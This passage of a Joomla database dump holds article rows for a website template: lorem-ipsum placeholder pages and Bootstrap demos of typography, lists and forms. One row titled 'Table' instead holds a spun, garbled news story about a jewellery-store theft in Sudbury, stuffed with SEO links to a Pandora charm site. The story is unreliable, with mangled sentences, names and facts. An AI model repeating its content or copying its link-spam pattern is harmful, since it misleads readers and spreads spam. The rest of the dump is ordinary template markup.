00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,1,'','',1,92,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(73,179,'Offline Page','offline-page','Lorem ipsum dolor sit amet consectetuer nulla parturient ullamcorper volutpat nisl. Condimentum felis netus pede enim pellentesque semper sed laoreet turpis Nulla. Tellus tempor Curabitur augue elit mus pellentesque justo mauris cursus Nunc. Mollis mauris et In eleifend Quisque in nulla Integer dui quis. Nulla congue magna odio ullamcorper aliquam nascetur et sit eget fermentum. Purus mauris nunc ut.\r\n<img src=\"images/features/offlinepage.jpg\" alt=\"Expose Offline page\" />','',1,77,'2012-07-13 10:57:04',736,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-07-13 10:57:04','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,110,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(74,181,'Typography','typography','\r\n<h1 class=\"title\">Typography</h1>\r\n\r\n<h2 id=\"headings\">Headings</h2>\r\n<p>All HTML headings, <code><h1></code> through <code><h6></code> are available.</p>\r\n<div class=\"bs-example\">\r\n <h1>h1. Heading 1</h1>\r\n <h2>h2. Heading 2</h2>\r\n <h3>h3. Heading 3</h3>\r\n <h4>h4. Heading 4</h4>\r\n <h5>h5. Heading 5</h5>\r\n <h6>h6. Heading 6</h6>\r\n</div>\r\n\r\n<h2 id=\"body-copy\">Body copy</h2>\r\n<p>Bootstrap\'s global default <code>font-size</code> is <strong>14px</strong>, with a <code>line-height</code> of <strong>20px</strong>. This is applied to the <code><body></code> and all paragraphs. In addition, <code><p></code> (paragraphs) receive a bottom margin of half their line-height (10px by default).</p>\r\n<div class=\"bs-example\">\r\n <p>Nullam quis risus eget urna mollis ornare vel eu leo. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nullam id dolor id nibh ultricies vehicula.</p>\r\n <p>Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Donec ullamcorper nulla non metus auctor fringilla. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Donec ullamcorper nulla non metus auctor fringilla.</p>\r\n <p>Maecenas sed diam eget risus varius blandit sit amet non magna. Donec id elit non mi porta gravida at eget metus. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit.</p>\r\n</div>\r\n<pre class=\"prettyprint\"><p>...</p></pre>\r\n\r\n<h3>Lead body copy</h3>\r\n<p>Make a paragraph stand out by adding <code>.lead</code>.</p>\r\n<div class=\"bs-example\">\r\n <p class=\"lead\">Vivamus sagittis lacus vel augue laoreet rutrum faucibus dolor auctor. Duis mollis, est non commodo luctus.</p>\r\n</div>\r\n<pre class=\"prettyprint\"><p class=\"lead\">...</p></pre>\r\n\r\n<h3>Built with Less</h3>\r\n<p>The typographic scale is based on two LESS variables in <strong>variables.less</strong>: <code>@baseFontSize</code> and <code>@baseLineHeight</code>. The first is the base font-size used throughout and the second is the base line-height. We use those variables and some simple math to create the margins, paddings, and line-heights of all our type and more. Customize them and Bootstrap adapts.</p>\r\n\r\n\r\n<hr class=\"bs-separator\" />\r\n\r\n\r\n<h2 id=\"emphasis\">Emphasis</h2>\r\n<p>Make use of HTML\'s default emphasis tags with lightweight styles.</p>\r\n\r\n<h3><code><small></code></h3>\r\n<p>For de-emphasizing inline or blocks of text, <small>use the small tag.</small></p>\r\n<div class=\"bs-example\">\r\n <p><small>This line of text is meant to be treated as fine print.</small></p>\r\n</div>\r\n<pre class=\"prettyprint\">\r\n<p>\r\n <small>This line of text is meant to be treated as fine print.</small>\r\n</p>\r\n</pre>\r\n\r\n<h3>Bold</h3>\r\n<p>For emphasizing a snippet of text with a heavier font-weight.</p>\r\n<div class=\"bs-example\">\r\n <p>The following snippet of text is <strong>rendered as bold text</strong>.</p>\r\n</div>\r\n<pre class=\"prettyprint\"><strong>rendered as bold text</strong></pre>\r\n\r\n<h3>Italics</h3>\r\n<p>For emphasizing a snippet of text with italics.</p>\r\n<div class=\"bs-example\">\r\n <p>The following snippet of text is <em>rendered as italicized text</em>.</p>\r\n</div>\r\n<pre class=\"prettyprint\"><em>rendered as italicized text</em></pre>\r\n\r\n<p><span class=\"label label-info\">Heads up!</span> Feel free to use <code><b></code> and <code><i></code> in HTML5. <code><b></code> is meant to highlight words or phrases without conveying additional importance while <code><i></code> is mostly for voice, technical terms, etc.</p>\r\n\r\n<h3>Emphasis classes</h3>\r\n<p>Convey meaning through color with a handful of emphasis utility classes.</p>\r\n<div class=\"bs-example\">\r\n <p class=\"muted\">Fusce dapibus, tellus ac cursus commodo, tortor mauris nibh.</p>\r\n <p class=\"text-warning\">Etiam porta sem malesuada magna mollis euismod.</p>\r\n <p class=\"text-error\">Donec ullamcorper nulla non metus auctor fringilla.</p>\r\n <p class=\"text-info\">Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis.</p>\r\n <p class=\"text-success\">Duis mollis, est non commodo luctus, nisi erat porttitor ligula.</p>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<p class=\"muted\">Fusce dapibus, tellus ac cursus commodo, tortor mauris nibh.</p>\r\n<p class=\"text-warning\">Etiam porta sem malesuada magna mollis euismod.</p>\r\n<p class=\"text-error\">Donec ullamcorper nulla non metus auctor fringilla.</p>\r\n<p class=\"text-info\">Aenean eu leo quam. Pellentesque ornare sem lacinia quam venenatis.</p>\r\n<p class=\"text-success\">Duis mollis, est non commodo luctus, nisi erat porttitor ligula.</p>\r\n</pre>\r\n\r\n\r\n<hr class=\"bs-separator\" />\r\n\r\n\r\n<h2 id=\"abbreviations\">Abbreviations</h2>\r\n<p>Stylized implemenation of HTML\'s <code><abbr></code> element for abbreviations and acronyms to show the expanded version on hover. Abbreviations with a <code>title</code> attribute have a light dotted bottom border and a help cursor on hover, providing additional context on hover.</p>\r\n\r\n<h3><code><abbr></code></h3>\r\n<p>For expanded text on long hover of an abbreviation, include the <code>title</code> attribute.</p>\r\n<div class=\"bs-example\">\r\n <p>An abbreviation of the word attribute is <abbr title=\"attribute\">attr</abbr>.</p>\r\n</div>\r\n<pre class=\"prettyprint\"><abbr title=\"attribute\">attr</abbr></pre>\r\n\r\n<h3><code><abbr class=\"initialism\"></code></h3>\r\n<p>Add <code>.initialism</code> to an abbreviation for a slightly smaller font-size.</p>\r\n<div class=\"bs-example\">\r\n <p><abbr title=\"HyperText Markup Language\" class=\"initialism\">HTML</abbr> is the best thing since sliced bread.</p>\r\n</div>\r\n<pre class=\"prettyprint\"><abbr title=\"HyperText Markup Language\" class=\"initialism\">HTML</abbr></pre>\r\n\r\n\r\n<hr class=\"bs-separator\" />\r\n\r\n\r\n<h2 id=\"addresses\">Addresses</h2>\r\n<p>Present contact information for the nearest ancestor or the entire body of work.</p>\r\n\r\n<h3><code><address></code></h3>\r\n<p>Preserve formatting by ending all lines with <code><br></code>.</p>\r\n<div class=\"bs-example\">\r\n <address>\r\n <strong>Twitter, Inc.</strong><br />\r\n 795 Folsom Ave, Suite 600<br />\r\n San Francisco, CA 94107<br />\r\n <abbr title=\"Phone\">P:</abbr> (123) 456-7890\r\n </address>\r\n <address>\r\n <strong>Full Name</strong><br />\r\n <a href=\"mailto:#\">first.last@gmail.com</a>\r\n </address>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<address>\r\n <strong>Twitter, Inc.</strong><br>\r\n 795 Folsom Ave, Suite 600<br>\r\n San Francisco, CA 94107<br>\r\n <abbr title=\"Phone\">P:</abbr> (123) 456-7890\r\n</address>\r\n\r\n<address>\r\n <strong>Full Name</strong><br>\r\n <a href=\"mailto:#\">first.last@gmail.com</a>\r\n</address>\r\n</pre>\r\n\r\n\r\n<hr class=\"bs-separator\" />\r\n\r\n\r\n<h2 id=\"blockquotes\">Blockquotes</h2>\r\n<p>For quoting blocks of content from another source within your document.</p>\r\n\r\n<h3>Default blockquote</h3>\r\n<p>Wrap <code><blockquote></code> around any <abbr title=\"HyperText Markup Language\">HTML</abbr> as the quote. For straight quotes we recommend a <code><p></code>.</p>\r\n<div class=\"bs-example\">\r\n <blockquote>\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.</p>\r\n </blockquote>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<blockquote>\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.</p>\r\n</blockquote>\r\n</pre>\r\n\r\n<h3>Blockquote options</h3>\r\n<p>Style and content changes for simple variations on a standard blockquote.</p>\r\n\r\n<h4>Naming a source</h4>\r\n<p>Add <code><small></code> tag for identifying the source. Wrap the name of the source work in <code><cite></code>.</p>\r\n<div class=\"bs-example\">\r\n <blockquote>\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.</p>\r\n <small>Someone famous in <cite title=\"Source Title\">Source Title</cite></small>\r\n </blockquote>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<blockquote>\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.</p>\r\n <small>Someone famous <cite title=\"Source Title\">Source Title</cite></small>\r\n</blockquote>\r\n</pre>\r\n\r\n<h4>Alternate displays</h4>\r\n<p>Use <code>.pull-right</code> for a floated, right-aligned blockquote.</p>\r\n<div class=\"bs-example\" style=\"overflow: hidden;\">\r\n <blockquote class=\"pull-right\">\r\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.</p>\r\n <small>Someone famous in <cite title=\"Source Title\">Source Title</cite></small>\r\n </blockquote>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<blockquote class=\"pull-right\">\r\n ...\r\n</blockquote>\r\n</pre>\r\n\r\n<h3>Description</h3>\r\n<p>A list of terms with their associated descriptions.</p>\r\n<div class=\"bs-example\">\r\n <dl>\r\n <dt>Description lists</dt>\r\n <dd>A description list is perfect for defining terms.</dd>\r\n <dt>Euismod</dt>\r\n <dd>Vestibulum id ligula porta felis euismod semper eget lacinia odio sem nec elit.</dd>\r\n <dd>Donec id elit non mi porta gravida at eget metus.</dd>\r\n <dt>Malesuada porta</dt>\r\n <dd>Etiam porta sem malesuada magna mollis euismod.</dd>\r\n </dl>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<dl>\r\n <dt>...</dt>\r\n <dd>...</dd>\r\n</dl>\r\n</pre>\r\n\r\n<h4>Horizontal description</h4>\r\n<p>Make terms and descriptions in <code><dl></code> line up side-by-side.</p>\r\n<div class=\"bs-example\">\r\n <dl class=\"dl-horizontal\">\r\n <dt>Description lists</dt>\r\n <dd>A description list is perfect for defining terms.</dd>\r\n <dt>Euismod</dt>\r\n <dd>Vestibulum id ligula porta felis euismod semper eget lacinia odio sem nec elit.</dd>\r\n <dd>Donec id elit non mi porta gravida at eget metus.</dd>\r\n <dt>Malesuada porta</dt>\r\n <dd>Etiam porta sem malesuada magna mollis euismod.</dd>\r\n <dt>Felis euismod semper eget lacinia</dt>\r\n <dd>Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus.</dd>\r\n </dl>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<dl class=\"dl-horizontal\">\r\n <dt>...</dt>\r\n <dd>...</dd>\r\n</dl>\r\n</pre>\r\n<p>\r\n <span class=\"label label-info\">Heads up!</span>\r\n Horizontal description lists will truncate terms that are too long to fit in the left column fix <code>text-overflow</code>. In narrower viewports, they will change to the default stacked layout.\r\n</p>\r\n','',1,78,'2012-11-18 12:45:23',736,'','2012-11-21 08:12:24',42,0,'0000-00-00 00:00:00','2012-11-18 12:45:23','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,3,'','',1,204,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(75,182,'List','list','<h1 class=\"title\">Lists</h1>\r\n\r\n<h2>Unordered</h2>\r\n<p>A list of items in which the order does <em>not</em> explicitly matter.</p>\r\n<div class=\"bs-example\">\r\n <ul>\r\n <li>Lorem ipsum dolor sit amet</li>\r\n <li>Consectetur adipiscing elit</li>\r\n <li>Integer molestie lorem at massa</li>\r\n <li>Facilisis in pretium nisl aliquet</li>\r\n <li>Nulla volutpat aliquam velit\r\n <ul>\r\n <li>Phasellus iaculis neque</li>\r\n <li>Purus sodales ultricies</li>\r\n <li>Vestibulum laoreet porttitor sem</li>\r\n <li>Ac tristique libero volutpat at</li>\r\n </ul>\r\n </li>\r\n <li>Faucibus porta lacus fringilla vel</li>\r\n <li>Aenean sit amet erat nunc</li>\r\n <li>Eget porttitor lorem</li>\r\n </ul>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<ul>\r\n <li>...</li>\r\n</ul>\r\n</pre>\r\n\r\n<h2>Ordered</h2>\r\n<p>A list of items in which the order <em>does</em> explicitly matter.</p>\r\n<div class=\"bs-example\">\r\n <ol>\r\n <li>Lorem ipsum dolor sit amet</li>\r\n <li>Consectetur adipiscing elit</li>\r\n <li>Integer molestie lorem at massa</li>\r\n <li>Facilisis in pretium nisl aliquet</li>\r\n <li>Nulla volutpat aliquam velit</li>\r\n <li>Faucibus porta lacus fringilla vel</li>\r\n <li>Aenean sit amet erat nunc</li>\r\n <li>Eget porttitor lorem</li>\r\n </ol>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<ol>\r\n <li>...</li>\r\n</ol>\r\n</pre>\r\n\r\n<h2>Unstyled</h2>\r\n<p>A list of items with no <code>list-style</code> or additional left padding.</p>\r\n<div class=\"bs-example\">\r\n <ul class=\"unstyled\">\r\n <li>Lorem ipsum dolor sit amet</li>\r\n <li>Consectetur adipiscing elit</li>\r\n <li>Integer molestie lorem at massa</li>\r\n <li>Facilisis in pretium nisl aliquet</li>\r\n <li>Nulla volutpat aliquam velit\r\n <ul>\r\n <li>Phasellus iaculis neque</li>\r\n <li>Purus sodales ultricies</li>\r\n <li>Vestibulum laoreet porttitor sem</li>\r\n <li>Ac tristique libero volutpat at</li>\r\n </ul>\r\n </li>\r\n <li>Faucibus porta lacus fringilla vel</li>\r\n <li>Aenean sit amet erat nunc</li>\r\n <li>Eget porttitor lorem</li>\r\n </ul>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<ul class=\"unstyled\">\r\n <li>...</li>\r\n</ul>\r\n</pre>','',1,78,'2012-11-18 13:21:00',736,'','2012-11-21 08:12:24',42,0,'0000-00-00 00:00:00','2012-11-18 13:21:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,4,'','',1,95,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(76,183,'Table','table','<p>Armed thief in sudbury gets jail <br /><br />Armed thief <b><a title=\"Where Do You Get Pandora Bracelets\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Where Do You Get Pandora Bracelets</a></b> in sudbury gets jail <br /><br />A one armed man who wriggled free with a gold chain despite being gang tackled by three employees at a downtown jewelry store will pay out a year in jail.<br /><br />Want to say i\'m sorry to the three workers, said byron cromarty from the prisoner\'s box saturday in the ontario court of justice.Felt bad when i hurt you(Woman who collected minor arm and leg injuries).<br /><br />Made a big shame.I was stealing from people who work hard for their funds.Who was simply facing charges of robbery and breach of probation, pleaded in the wrong to breach of probation, and to theft and infiltration, as opposed to robbery.<br /><br />Justice rich humphrey gave cromarty, 23, credit for his 26 days in custody and another 11 <b><a title=\"Cheap Pandora Charms Canada\" href=\"http://www.milagrofilms.ca\">Cheap Pandora Charms Canada</a></b> months jail and a five year pistols ban.He also ordered cromarty use a genetic sample to the national dna databank.<br /><br />Then of the robbery, cromarty was on an 18 month probation order issued in thinking about receiving.<br /><br />Not the beginer you have robbed someone, humphrey reminded cromarty.Have a problem with drug abuse.I think that is where you need to start.This is a extremely serious offence.It started off as a robbery.<br /><br />Very fortunate the ladies who were involved in your attempted hesitation were not(Earnestly)Wounded.August.31 and asked to recieve a 24 inch, 10 carat gold chain good priced $650.95.<br /><br />When he was shown the chain by a worker, cromarty grabbed it and experimented with leave.<br /><br />The feminine employee, on the flip side, grabbed cromarty\'s left arm and was then accompanied by two other female employees who tried to restrain him.<br /><br />In the melee, about the other hand, cromarty squirmed free and fled using the chain, providing his shirt behind.While cromarty was arrested a short while later, the chain was not recoverable.<br /><br />Maryann rich, a shop assistant at robert brown jewellers, talked to the star a few days following your altercation. (Cromarty)Said \'thank you very much\' while holding among the chains and started walking toward the door, richard remembered. \"He got to the door and i realized he became going to walk out with it.I was surprised.I was surprised.I selected him by the arm and told him \'hey, excuse me, you are not going anywhere\'.Said she was offended by the man\'s boldness and selfishness.That has been all the fuel she needed.Once away from the shop, she tackled the may be thief by his legs.<br /><br />Figured \'how else am i going to tear down this guy\', she told me.Grabbed onto his legs and held on as snugly as i could.He was waiting to hear about me off, pushing through doing this and that, but i was just waiting on hold, <br /><br />Eventually, two of her peers liette soloman and 60 year old linda blake came to her assistance.Still, he squeezed free and escape.<br /><br />A new 5 foot 1, 105 pound rich, who has lived with fibromyalgia syndrome for about 20 years, a break down bruised elbow and a badly scraped knee.<br /><br />Defence lawyer robert beckett told the court wednesday that cromarty only used force in trying to escape and did not intend to assault anyone.<br /><br />Beckett said that cromarty had a hard childhood, is suffering alcohol addiction and lost his right arm while asleep on railway tracks after heavy drinking.However, he said cromarty is a very good young man and is just a few credits short of completing his high school diploma.<br /><br />Come through a lot at age of 23, described beckett.<br /><br />Assistant crown attorney kenrick abbott called the robbery attempt sentence humphrey issued had been highly preferred in a joint submission by beckett and abbott.<br /><br /></p>','',1,78,'2012-11-18 13:45:04',736,'','2015-06-15 07:38:08',736,736,'2015-06-15 07:38:08','2012-11-18 13:45:04','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,5,'','',1,616,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(77,184,'Forms','forms','<section id=\"forms\">\r\n \r\n <h1 class=\"title\">Forms</h1>\r\n \r\n \r\n <h2>Default styles</h2>\r\n <p>Individual form controls receive styling, but without any required base class on the <code><form></code> or large changes in markup. Results in stacked, left-aligned labels on top of form controls.</p>\r\n <form class=\"bs-example\">\r\n <fieldset>\r\n <legend>Legend</legend>\r\n <label>Label name</label>\r\n <input type=\"text\" placeholder=\"Type something…\" />\r\n <span class=\"help-block\">Example block-level help text here.</span>\r\n <label class=\"checkbox\">\r\n <input type=\"checkbox\" /> Check me out\r\n </label>\r\n <button type=\"submit\" class=\"btn\">Submit</button>\r\n </fieldset>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<form>\r\n <fieldset>\r\n <legend>Legend</legend>\r\n <label>Label name</label>\r\n <input type=\"text\" placeholder=\"Type something…\">\r\n <span class=\"help-block\">Example block-level help text here.</span>\r\n <label class=\"checkbox\">\r\n <input type=\"checkbox\"> Check me out\r\n </label>\r\n <button type=\"submit\" class=\"btn\">Submit</button>\r\n </fieldset>\r\n</form>\r\n</pre>\r\n \r\n \r\n <hr class=\"bs-separator\" />\r\n \r\n \r\n <h2>Optional layouts</h2>\r\n <p>Included with Bootstrap are three optional form layouts for common use cases.</p>\r\n \r\n <h3>Search form</h3>\r\n <p>Add <code>.form-search</code> to the form and <code>.search-query</code> to the <code><input></code> for an extra-rounded text input.</p>\r\n <form class=\"bs-example form-search\">\r\n <input type=\"text\" class=\"input-medium search-query\" />\r\n <button type=\"submit\" class=\"btn\">Search</button>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<form class=\"form-search\">\r\n <input type=\"text\" class=\"input-medium search-query\">\r\n <button type=\"submit\" class=\"btn\">Search</button>\r\n</form>\r\n</pre>\r\n \r\n <h3>Inline form</h3>\r\n <p>Add <code>.form-inline</code> for left-aligned labels and inline-block controls for a compact layout.</p>\r\n <form class=\"bs-example form-inline\">\r\n <input type=\"text\" class=\"input-small\" placeholder=\"Email\" />\r\n <input type=\"password\" class=\"input-small\" placeholder=\"Password\" />\r\n <label class=\"checkbox\">\r\n <input type=\"checkbox\" /> Remember me\r\n </label>\r\n <button type=\"submit\" class=\"btn\">Sign in</button>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<form class=\"form-inline\">\r\n <input type=\"text\" class=\"input-small\" placeholder=\"Email\">\r\n <input type=\"password\" class=\"input-small\" placeholder=\"Password\">\r\n <label class=\"checkbox\">\r\n <input type=\"checkbox\"> Remember me\r\n </label>\r\n <button type=\"submit\" class=\"btn\">Sign in</button>\r\n</form>\r\n</pre>\r\n \r\n <h3>Horizontal form</h3>\r\n <p>Right align labels and float them to the left to make them appear on the same line as controls. Requires the most markup changes from a default form:</p>\r\n <ul>\r\n <li>Add <code>.form-horizontal</code> to the form</li>\r\n <li>Wrap labels and controls in <code>.control-group</code></li>\r\n <li>Add <code>.control-label</code> to the label</li>\r\n <li>Wrap any associated controls in <code>.controls</code> for proper alignment</li>\r\n </ul>\r\n <form class=\"bs-example form-horizontal\">\r\n <div class=\"control-group\">\r\n <label class=\"control-label\" for=\"inputEmail\">Email</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputEmail\" placeholder=\"Email\" />\r\n </div>\r\n </div>\r\n <div class=\"control-group\">\r\n <label class=\"control-label\" for=\"inputPassword\">Password</label>\r\n <div class=\"controls\">\r\n <input type=\"password\" id=\"inputPassword\" placeholder=\"Password\" />\r\n </div>\r\n </div>\r\n <div class=\"control-group\">\r\n <div class=\"controls\">\r\n <label class=\"checkbox\">\r\n <input type=\"checkbox\" /> Remember me\r\n </label>\r\n <button type=\"submit\" class=\"btn\">Sign in</button>\r\n </div>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<form class=\"form-horizontal\">\r\n <div class=\"control-group\">\r\n <label class=\"control-label\" for=\"inputEmail\">Email</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputEmail\" placeholder=\"Email\">\r\n </div>\r\n </div>\r\n <div class=\"control-group\">\r\n <label class=\"control-label\" for=\"inputPassword\">Password</label>\r\n <div class=\"controls\">\r\n <input type=\"password\" id=\"inputPassword\" placeholder=\"Password\">\r\n </div>\r\n </div>\r\n <div class=\"control-group\">\r\n <div class=\"controls\">\r\n <label class=\"checkbox\">\r\n <input type=\"checkbox\"> Remember me\r\n </label>\r\n <button type=\"submit\" class=\"btn\">Sign in</button>\r\n </div>\r\n </div>\r\n</form>\r\n</pre>\r\n \r\n \r\n <hr class=\"bs-separator\" />\r\n \r\n \r\n <h2>Supported form controls</h2>\r\n <p>Examples of standard form controls supported in an example form layout.</p>\r\n \r\n <h3>Inputs</h3>\r\n <p>Most common form control, text-based input fields. Includes support for all HTML5 types: text, password, datetime, datetime-local, date, month, time, week, number, email, url, search, tel, and color.</p>\r\n <p>Requires the use of a specified <code>type</code> at all times.</p>\r\n <form class=\"bs-example form-inline\">\r\n <input type=\"text\" placeholder=\"Text input\" />\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input type=\"text\" placeholder=\"Text input\">\r\n</pre>\r\n \r\n <h3>Textarea</h3>\r\n <p>Form control which supports multiple lines of text. Change <code>rows</code> attribute as necessary.</p>\r\n <form class=\"bs-example form-inline\">\r\n <textarea rows=\"3\"></textarea>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<textarea rows=\"3\"></textarea>\r\n</pre>\r\n \r\n <h3>Checkboxes and radios</h3>\r\n <p>Checkboxes are for selecting one or several options in a list while radios are for selecting one option from many.</p>\r\n <h4>Default (stacked)</h4>\r\n <form class=\"bs-example\">\r\n <label class=\"checkbox\">\r\n <input type=\"checkbox\" value=\"\" />\r\n Option one is this and that—be sure to include why it\'s great\r\n </label>\r\n <br />\r\n <label class=\"radio\">\r\n <input type=\"radio\" name=\"optionsRadios\" id=\"optionsRadios1\" value=\"option1\" />\r\n Option one is this and that—be sure to include why it\'s great\r\n </label>\r\n <label class=\"radio\">\r\n <input type=\"radio\" name=\"optionsRadios\" id=\"optionsRadios2\" value=\"option2\" />\r\n Option two can be something else and selecting it will deselect option one\r\n </label>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<label class=\"checkbox\">\r\n <input type=\"checkbox\" value=\"\">\r\n Option one is this and that—be sure to include why it\'s great\r\n</label>\r\n\r\n<label class=\"radio\">\r\n <input type=\"radio\" name=\"optionsRadios\" id=\"optionsRadios1\" value=\"option1\" checked>\r\n Option one is this and that—be sure to include why it\'s great\r\n</label>\r\n<label class=\"radio\">\r\n <input type=\"radio\" name=\"optionsRadios\" id=\"optionsRadios2\" value=\"option2\">\r\n Option two can be something else and selecting it will deselect option one\r\n</label>\r\n</pre>\r\n \r\n <h4>Inline checkboxes</h4>\r\n <p>Add the <code>.inline</code> class to a series of checkboxes or radios for controls appear on the same line.</p>\r\n <form class=\"bs-example\">\r\n <label class=\"checkbox inline\">\r\n <input type=\"checkbox\" id=\"inlineCheckbox1\" value=\"option1\" /> 1\r\n </label>\r\n <label class=\"checkbox 